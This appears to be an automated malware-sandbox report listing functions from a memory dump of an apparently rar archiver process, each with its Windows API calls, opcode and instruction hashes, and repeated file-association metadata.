Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: ConsoleFileHandleModeType
String ID:
API String ID: 4141822043-0
Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
Instruction ID: b8b64a5189ae05811ea352a695c51526024873c740c55d143597996a625faa58
Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
Instruction Fuzzy Hash: F3E08C20E0460282EA688B21A86E13906E1DF49F80F4021B8D80FCF391EE2C9C8D8300

Function 00007FF695CF4044 Relevance: 3.3, APIs: 2, Instructions: 336COMMON

Download Yara Rule

APIs

OemToCharA.USER32 ref: 00007FF695CF4255
ExpandEnvironmentStringsW.KERNEL32(?,?,00000000,?,?,?,?,?,00007FF695CD6CD9), ref: 00007FF695CF447C

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: CharEnvironmentExpandStrings
String ID:
API String ID: 4052775200-0
Opcode ID: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
Instruction ID: f365b585bc1288b6b75694deadb3a396d9af2923731a589fe4df6920938463ca
Opcode Fuzzy Hash: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
Instruction Fuzzy Hash: 90E1CE23A18682D1EB308B26D4801BE66F0FB91B90F44517ADF9D87AD9DF7CE885D700

Function 00007FF695CF1AF0 Relevance: 3.1, APIs: 2, Instructions: 85fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF695CE7EBE,00000000,00000000,00000000,00000000,00000007,00007FF695CE7C48), ref: 00007FF695CF1B8D
CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF695CE7EBE,00000000,00000000,00000000,00000000,00000007,00007FF695CE7C48), ref: 00007FF695CF1BD7

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
Instruction ID: 3a271922e63127f3f6356d5cd38a8a97e9c0e4aadede955f3b3fc2861efd2210
Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
Instruction Fuzzy Hash: F831F4A3A1868586F7709F20D4053B926E0EB81F79F105378DE6C866C5EFBCC9898744

Function 00007FF695CD681C Relevance: 3.1, APIs: 2, Instructions: 75COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF695CD68AE
_CxxThrowException.LIBVCRUNTIME ref: 00007FF695CD68BF

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: ExceptionThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 932687459-0
Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
Instruction ID: bffd69ab892f2eb10208106d79b13b72da81544c82ec777872fc0ef6a5b58e75
Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
Instruction Fuzzy Hash: 88213753918F8582DB11CF29D5511B863B0FB58F88B14A365DF9D83656EF38E5E5C300

Function 00007FF695D0915C Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF695D091CA
new.LIBCMT ref: 00007FF695D091F2

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41790b01cb1f7c00ec1593391ec280087b552f2c22c642c21a2f5fc04b89232f
Instruction ID: b4eb3fe79af71eaafce42adcad3921504b04a5c528a7fafddf10452c0a7e4364
Opcode Fuzzy Hash: 41790b01cb1f7c00ec1593391ec280087b552f2c22c642c21a2f5fc04b89232f
Instruction Fuzzy Hash: 3911B932509B8182EA20DB64B5003A972E4EF84F90F240779EA9D477E6DE7CD856C308

Function 00007FF695CF20B4 Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,00007FF695CF22EE), ref: 00007FF695CF211B
GetLastError.KERNEL32(?,?,?,00007FF695CF22EE), ref: 00007FF695CF2126

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
Instruction ID: d5d29169f9b4963f1e8a491d806dab2065e971a9c88f1428c058d4c6687f63dc
Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
Instruction Fuzzy Hash: BC01C222A19691C2EA748B26A90013D62F1EF54FA0F649374DE2DC3BD4CE2CEC41E704

Function 00007FF695CE7A68 Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

setbuf.LIBCMT ref: 00007FF695CE7A7B

Part of subcall function 00007FF695D32AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF695D37EF3

setbuf.LIBCMT ref: 00007FF695CE7A8F

Part of subcall function 00007FF695CE7B44: GetStdHandle.KERNEL32(?,?,?,00007FF695CE7A9E), ref: 00007FF695CE7B4A
Part of subcall function 00007FF695CE7B44: GetFileType.KERNELBASE(?,?,?,00007FF695CE7A9E), ref: 00007FF695CE7B56
Part of subcall function 00007FF695CE7B44: GetConsoleMode.KERNEL32(?,?,?,00007FF695CE7A9E), ref: 00007FF695CE7B69

Part of subcall function 00007FF695D32ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF695D32AD0

Part of subcall function 00007FF695D32B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF695D32C1C

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
String ID:
API String ID: 4044681568-0
Opcode ID: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
Instruction ID: 41ed9f8de5a77ea8bad87b8419ce4efacdfedc809d8b72e85b1906203625c26a
Opcode Fuzzy Hash: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
Instruction Fuzzy Hash: 1E010201E0918286FA38B37518A63B914C2CF82F94F1463F8E15DCA3E7DD6C2C0A831A

Function 00007FF695CF2440 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007FF695CF2480
GetLastError.KERNEL32 ref: 00007FF695CF248D

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
Instruction ID: 124b52bb1a694d3fa6ed5f56f0de2af29a9835a16b3263e6495eb78ae7dac3c9
Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
Instruction Fuzzy Hash: 9301AD22A08642C2EB749F29E84527827B1EB44F78F545375EA3D8A1E5CF7CDD8AC700

Function 00007FF695CF30C8 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000800,00007FF695CF305D,?,?,?,?,?,?,?,?,00007FF695D04126,?,?,?,?,00000800), ref: 00007FF695CF30F0
GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF695D04126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF695CF3119

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
Instruction ID: 4ccdf195d48160dfd9f8814ac12b6aca266ccaec030ad9185efbd1aa1646f3ef
Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
Instruction Fuzzy Hash: ECF08121B1868142FA709B24E4542B962E0EB4CB94F401675ED9CC7799CF6CD9494A04

Function 00007FF695D1B3F0 Relevance: 3.0, APIs: 2, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(00000000,00007FF695D17F72), ref: 00007FF695D1B41E
LoadLibraryExW.KERNELBASE ref: 00007FF695D1B449

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
Instruction ID: e13fde1a30ed35e0c6247ff81642847571415aba84a42e53ace9abcf3104a84a
Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
Instruction Fuzzy Hash: A6F09621B1858146F6709B20E8153F663E4FF8CB84F805271E9CDC6699DF2CDA4D8B44

Function 00007FF695D1BA70 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,00007FF695D1BACD), ref: 00007FF695D1BA74
GetProcessAffinityMask.KERNEL32 ref: 00007FF695D1BA87

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
Instruction ID: 0124f06cbebf4eaf3c9df04e1706a8709cb9b81711081657508e098dd4d67d85
Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
Instruction Fuzzy Hash: 3CE02221B3849146EBF88B19C492FB923D0EF44F80F803039F80BC3A54EE2CC8488B44

Function 00007FF695D34A74 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL ref: 00007FF695D34A8A
GetLastError.KERNEL32 ref: 00007FF695D34A9C

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
Instruction ID: 25687b9c2a21f8eca6cd1b9d8f3ad00ead31824f0bbc03179d7256faa43ec177
Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
Instruction Fuzzy Hash: 14E0B661E1A54242FE68ABB2A81917412D1EF48F48F0866B4D91DCA292EE3CAC49425C

Function 00007FF695D171FC Relevance: 1.9, APIs: 1, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61a38848863585528245087ec57b3d7db4ec2e2857ebd3184b0d5b51585d670b
Instruction ID: 3ebb982c4bc36e3ee3e85541e33f73912261514aea2e8e7a79f7174714b20ab0
Opcode Fuzzy Hash: 61a38848863585528245087ec57b3d7db4ec2e2857ebd3184b0d5b51585d670b
Instruction Fuzzy Hash: B1E1E721A0C68281FF789A20D4442BE27E1EF41F88F4462B5DE5D8B7E6DE3D9C49C714

Function 00007FF695CD72C4 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF695D0915C: new.LIBCMT ref: 00007FF695D091CA
Part of subcall function 00007FF695D0915C: new.LIBCMT ref: 00007FF695D091F2

new.LIBCMT ref: 00007FF695CD73DE

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 573272f0f587a5841e96f6de12058517ff70df0c9770e23d059943033ae7e521
Instruction ID: ede2e5aa9bc2df736f78cbf6ecdbe7f0b3fc27787634d272c4771e4f337b8cee
